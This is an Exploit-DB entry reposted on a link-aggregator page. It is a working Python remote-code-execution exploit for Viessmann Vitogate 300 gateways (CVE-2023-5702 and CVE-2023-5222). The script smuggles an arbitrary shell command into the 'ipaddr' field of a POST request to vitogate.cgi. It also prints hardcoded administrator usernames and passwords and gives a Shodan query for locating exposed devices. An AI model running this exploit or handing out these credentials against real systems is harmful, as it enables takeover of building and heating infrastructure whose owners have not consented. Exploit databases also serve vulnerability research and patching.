4
[remote] Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51887
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)
#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222
import argparse
import requests
def banner():
banner = """
╔═══════════════════════════════════╗
CVE-2023-5702
Vitogate 300 RCE
Author: ByteHunter
╚═══════════════════════════════════╝
"""
print(banner)
def send_post_request(target_ip, command, target_port):
payload = {
"method": "put",
"form": "form-4-7",
"session": "",
"params": {
"ipaddr": f"1;{command}"
}
}
headers = {
"Host": target_ip,
"Content-Length": str(len(str(payload))),
"Content-Type": "application/json"
}
url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"
response = requests.post(url, json=payload, headers=headers)
if response.status_code == 200:
print("Result:")
print(response.text)
else:
print(f"Request failed! status code: {response.status_code}")
def main():
parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
parser.add_argument("--target", required=False, help="Target IP address")
parser.add_argument("--port", required=False, help="Target port",default="80")
parser.add_argument("--command", required=False, help="Command")
parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")
args = parser.parse_args()
if args.creds:
print("Vitogate 300 hardcoded administrative accounts credentials")
print("Username: vitomaster, Password: viessmann1917")
print("Username: vitogate, Password: viessmann")
else:
target_ip = args.target
target_port = args.port
command = args.command
if not (target_ip and command):
print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
return
send_post_request(target_ip, command,target_port)
if __name__ == "__main__":
banner()
main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK